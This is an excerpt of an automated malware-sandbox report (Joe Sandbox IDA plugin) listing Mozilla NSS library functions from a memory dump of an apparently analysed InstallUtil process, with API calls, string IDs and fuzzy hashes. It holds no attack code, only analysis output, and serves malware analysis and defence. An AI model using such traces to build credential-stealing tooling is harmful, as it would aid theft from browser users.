                                                                                                                  Similarity
                                                                                                                  • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                  • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C796910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C796943
                                                                                                                    • Part of subcall function 6C796910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C796957
                                                                                                                    • Part of subcall function 6C796910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C796972
                                                                                                                    • Part of subcall function 6C796910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C796983
                                                                                                                    • Part of subcall function 6C796910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7969AA
                                                                                                                    • Part of subcall function 6C796910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7969BE
                                                                                                                    • Part of subcall function 6C796910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7969D2
                                                                                                                    • Part of subcall function 6C796910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7969DF
                                                                                                                    • Part of subcall function 6C796910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C796A5B
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C796D8C
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C796DC5
                                                                                                                  • free.MOZGLUE(?), ref: 6C796DD6
                                                                                                                  • free.MOZGLUE(?), ref: 6C796DE7
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C796E1F
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C796E4B
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C796E72
                                                                                                                  • free.MOZGLUE(?), ref: 6C796EA7
                                                                                                                  • free.MOZGLUE(?), ref: 6C796EC4
                                                                                                                  • free.MOZGLUE(?), ref: 6C796ED5
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C796EE3
                                                                                                                  • free.MOZGLUE(?), ref: 6C796EF4
                                                                                                                  • free.MOZGLUE(?), ref: 6C796F08
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C796F35
                                                                                                                  • free.MOZGLUE(?), ref: 6C796F44
                                                                                                                  • free.MOZGLUE(?), ref: 6C796F5B
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C796F65
                                                                                                                    • Part of subcall function 6C796C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C79781D,00000000,6C78BE2C,?,6C796B1D,?,?,?,?,00000000,00000000,6C79781D), ref: 6C796C40
                                                                                                                    • Part of subcall function 6C796C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C79781D,?,6C78BE2C,?), ref: 6C796C58
                                                                                                                    • Part of subcall function 6C796C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C79781D), ref: 6C796C6F
                                                                                                                    • Part of subcall function 6C796C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C796C84
                                                                                                                    • Part of subcall function 6C796C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C796C96
                                                                                                                    • Part of subcall function 6C796C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C796CAA
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C796F90
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C796FC5
                                                                                                                  • PK11_GetInternalKeySlot.NSS3 ref: 6C796FF4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                  • String ID: +`zl
                                                                                                                  • API String ID: 1304971872-2406776844
                                                                                                                  • Opcode ID: bbb21de6d5295fbe7df6346772a9ad2ec6c5bfcfa6a3c25f392cfaf67bb67779
                                                                                                                  • Instruction ID: 38cb24ffd007dac53c45ee74186bf5e47885d3245cec7e08f2dacbde4af6b658
                                                                                                                  • Opcode Fuzzy Hash: bbb21de6d5295fbe7df6346772a9ad2ec6c5bfcfa6a3c25f392cfaf67bb67779
                                                                                                                  • Instruction Fuzzy Hash: 90B173B0E012099FDF90DBA5EA45B9EBBB9BF05348F140235E815E7641E731EA14CBE1
                                                                                                                  APIs
                                                                                                                  • htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C78094D
                                                                                                                  • htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C780953
                                                                                                                  • htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6C78096E
                                                                                                                  • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6C780974
                                                                                                                  • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C78098F
                                                                                                                  • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C780995
                                                                                                                    • Part of subcall function 6C781800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C781860
                                                                                                                    • Part of subcall function 6C781800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C7809BF), ref: 6C781897
                                                                                                                    • Part of subcall function 6C781800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7818AA
                                                                                                                    • Part of subcall function 6C781800: memcpy.VCRUNTIME140(?,?,?), ref: 6C7818C4
                                                                                                                  • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C780B4F
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C780B5E
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C780B6B
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6C780B78
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
                                                                                                                  • String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
                                                                                                                  • API String ID: 1637529542-763765719
                                                                                                                  • Opcode ID: f5d4ef76adbe8f066c2e08f88fda0067ecadd2fc13e50d1582a1162344cb6e81
                                                                                                                  • Instruction ID: 0bf44ac7b292f05704d6e1008290e895f0e4c1ec3ab2a7d978a3c73f83a43e21
                                                                                                                  • Opcode Fuzzy Hash: f5d4ef76adbe8f066c2e08f88fda0067ecadd2fc13e50d1582a1162344cb6e81
                                                                                                                  • Instruction Fuzzy Hash: E4818B75605305AFC710CF55CD8499AFBE8FF8D608F048929FA9887B51E730EA19CB92
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C792DEC
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C792E00
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C792E2B
                                                                                                                  • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C792E43
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C764F1C,?,-00000001,00000000,?), ref: 6C792E74
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C764F1C,?,-00000001,00000000), ref: 6C792E88
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C792EC6
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C792EE4
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C792EF8
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C792F62
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C792F86
                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C), ref: 6C792F9E
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C792FCA
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C79301A
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C79302E
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C793066
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C793085
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C7930EC
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C79310C
                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C), ref: 6C793124
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C79314C
                                                                                                                    • Part of subcall function 6C779180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C7A379E,?,6C779568,00000000,?,6C7A379E,?,00000001,?), ref: 6C77918D
                                                                                                                    • Part of subcall function 6C779180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C7A379E,?,6C779568,00000000,?,6C7A379E,?,00000001,?), ref: 6C7791A0
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C79316D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3383223490-0
                                                                                                                  • Opcode ID: 902a5a76a77e363bb4ae607723a990beb6675d8be71a21e749029db891e02fdb
                                                                                                                  • Instruction ID: 4fdcd52b7331ea1c729270d282cb5c2047688ab2ad3dd2ff2e5544445fd31555
                                                                                                                  • Opcode Fuzzy Hash: 902a5a76a77e363bb4ae607723a990beb6675d8be71a21e749029db891e02fdb
                                                                                                                  • Instruction Fuzzy Hash: F9F1AEB1D00609AFDF10EF68E989B9DBBB5BF09318F144165EC04A7721E731E895CB91
                                                                                                                  APIs
                                                                                                                  • PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C76662E,?,?), ref: 6C79264E
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C76662E,?,?), ref: 6C792670
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C76662E,?), ref: 6C792684
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C7926C2
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C7926E0
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C7926F4
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C79274D
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C7928A9
                                                                                                                    • Part of subcall function 6C7A3440: PK11_GetAllTokens.NSS3 ref: 6C7A3481
                                                                                                                    • Part of subcall function 6C7A3440: PR_SetError.NSS3(00000000,00000000), ref: 6C7A34A3
                                                                                                                    • Part of subcall function 6C7A3440: TlsGetValue.KERNEL32 ref: 6C7A352E
                                                                                                                    • Part of subcall function 6C7A3440: EnterCriticalSection.KERNEL32(?), ref: 6C7A3542
                                                                                                                    • Part of subcall function 6C7A3440: PR_Unlock.NSS3(?), ref: 6C7A355B
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C7927A1
                                                                                                                  • PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C76662E,?,?,?), ref: 6C7927B5
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C7927CE
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7927E8
                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C), ref: 6C792800
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C79F854
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C79F868
                                                                                                                    • Part of subcall function 6C79F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C79F882
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(04C483FF,?,?), ref: 6C79F889
                                                                                                                    • Part of subcall function 6C79F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C79F8A4
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C79F8AB
                                                                                                                    • Part of subcall function 6C79F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C79F8C9
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(280F10EC,?,?), ref: 6C79F8D0
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C792834
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C79284E
                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C), ref: 6C792866
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$CriticalSection$Unlock$Enterfree$DeleteError$K11_calloc$ImportPublicTokens
                                                                                                                  • String ID: .fvl$.fvl
                                                                                                                  • API String ID: 544520609-1336400843
                                                                                                                  • Opcode ID: 5d042cd6e5e29196ec950aaca496c58f76b85ed0385488efaf8039a64f50f07e
                                                                                                                  • Instruction ID: 91681109670d0ccb5498c6155e71dbc46070056f22b7cc751703f1a32f419fa3
                                                                                                                  • Opcode Fuzzy Hash: 5d042cd6e5e29196ec950aaca496c58f76b85ed0385488efaf8039a64f50f07e
                                                                                                                  • Instruction Fuzzy Hash: BEB10670D00205DFDB10EF69EA88BAAB7B4FF09308F104539E905A7B02E731E941CBA1
                                                                                                                  APIs
                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_ALLOW_WEAK_SIGNATURE_ALG,00000002,00000000,?,6C795989), ref: 6C7B0571
                                                                                                                    • Part of subcall function 6C741240: TlsGetValue.KERNEL32(00000040,?,6C74116C,NSPR_LOG_MODULES), ref: 6C741267
                                                                                                                    • Part of subcall function 6C741240: EnterCriticalSection.KERNEL32(?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C74127C
                                                                                                                    • Part of subcall function 6C741240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C741291
                                                                                                                    • Part of subcall function 6C741240: PR_Unlock.NSS3(?,?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C7412A0
                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_HASH_ALG_SUPPORT,?,00000002,00000000,?,6C795989), ref: 6C7B05B7
                                                                                                                  • PORT_Strdup_Util.NSS3(00000000,?,?,00000002,00000000,?,6C795989), ref: 6C7B05C8
                                                                                                                  • strchr.VCRUNTIME140(00000000,0000003B,?,?,?,00000002,00000000,?,6C795989), ref: 6C7B05EC
                                                                                                                  • strstr.VCRUNTIME140(00000001,?), ref: 6C7B0653
                                                                                                                  • free.MOZGLUE(?,?,?,?,00000002,00000000,?,6C795989), ref: 6C7B0681
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800,?,?,?,?,00000002,00000000,?,6C795989), ref: 6C7B06AB
                                                                                                                  • PL_NewHashTable.NSS3(00000000,6C7AFE80,?,6C7FC350,00000000,00000000,?,?,?,?,?,00000002,00000000,?,6C795989), ref: 6C7B06D5
                                                                                                                  • PL_NewHashTable.NSS3(00000000,?,6C7FC350,6C7FC350,00000000,00000000), ref: 6C7B06EC
                                                                                                                  • PL_HashTableAdd.NSS3(?,6C87E618,6C87E618), ref: 6C7B070F
                                                                                                                    • Part of subcall function 6C6D2DF0: PL_HashTableRawAdd.NSS3(?,?,?,?,?), ref: 6C6D2E35
                                                                                                                  • PL_HashTableAdd.NSS3(FFFFFFFF,6C87E618), ref: 6C7B0738
                                                                                                                  • PL_HashTableAdd.NSS3(6C87E634,6C87E634), ref: 6C7B0752
                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000,?,?,?,?,00000002,00000000,?,6C795989), ref: 6C7B0767
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HashTable$SecureUtil$Arena_CriticalEnterErrorSectionStrdup_UnlockValuefreegetenvstrchrstrstr
                                                                                                                  • String ID: NSS_ALLOW_WEAK_SIGNATURE_ALG$NSS_HASH_ALG_SUPPORT$V$dynamic OID data$flags
                                                                                                                  • API String ID: 514890423-4248967104
                                                                                                                  • Opcode ID: 77ba2b8cb9edf78825c7d54a4f4f08c468beb1a8c10b114d0fdafd08f1b2ae58
                                                                                                                  • Instruction ID: a86b0da3a2d0d0ca3019b76106badfae3c3bab760e2863dfa862775dd93e704a
                                                                                                                  • Opcode Fuzzy Hash: 77ba2b8cb9edf78825c7d54a4f4f08c468beb1a8c10b114d0fdafd08f1b2ae58
                                                                                                                  • Instruction Fuzzy Hash: 6E51E0F1A012825EEB209E358F0DB677BA4AB8235CF180535D828E7B41E735D545CBE5
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C794C4C
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C794C60
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C794CA1
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C794CBE
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C794CD2
                                                                                                                  • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C794D3A
                                                                                                                  • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C794D4F
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C794DB7
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C794DD7
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C794DEC
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C794E1B
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C794E2F
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C794E5A
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C794E71
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C794E7A
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C794EA2
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C794EC1
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C794ED6
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C794F01
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C794F2A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                  • String ID:
